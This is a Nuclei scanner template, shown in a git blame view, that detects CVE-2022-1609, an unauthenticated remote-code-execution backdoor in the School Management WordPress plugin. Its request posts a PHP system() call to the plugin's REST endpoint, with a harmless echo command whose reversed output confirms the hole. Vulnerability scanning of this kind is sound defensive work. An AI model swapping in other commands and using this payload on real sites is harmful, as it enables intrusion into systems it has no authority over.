nuclei-templates/cves/2022/CVE-2022-1609.yaml

31 lines
732 B
YAML
Raw Normal View History

2022-05-26 06:25:43 +00:00
id: CVE-2022-1609
info:
2022-05-27 07:14:13 +00:00
name: The School Management < 9.9.7 - Unauthenticated RCE via REST api
2022-05-26 06:25:43 +00:00
author: For3stCo1d
severity: critical
reference:
2022-05-27 07:14:13 +00:00
- https://wpscan.com/vulnerability/e2d546c9-85b6-47a4-b951-781b9ae5d0f2
2022-05-26 06:25:43 +00:00
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1609
2022-05-27 07:14:13 +00:00
metadata:
verified: false
tags: cve2022,wordpress,rce,cve,wp,backdoor
2022-05-26 06:25:43 +00:00
variables:
2022-05-27 07:14:13 +00:00
cmd: "echo CVE-2022-1609 | rev"
2022-05-26 06:25:43 +00:00
requests:
- raw:
- |
POST /wp-json/am-member/license HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-05-27 07:14:13 +00:00
blowfish=1&blowf=system('{{cmd}}');
2022-05-26 06:25:43 +00:00
matchers-condition: and
matchers:
- type: word
words:
2022-05-27 07:14:13 +00:00
- '9061-2202-EVC'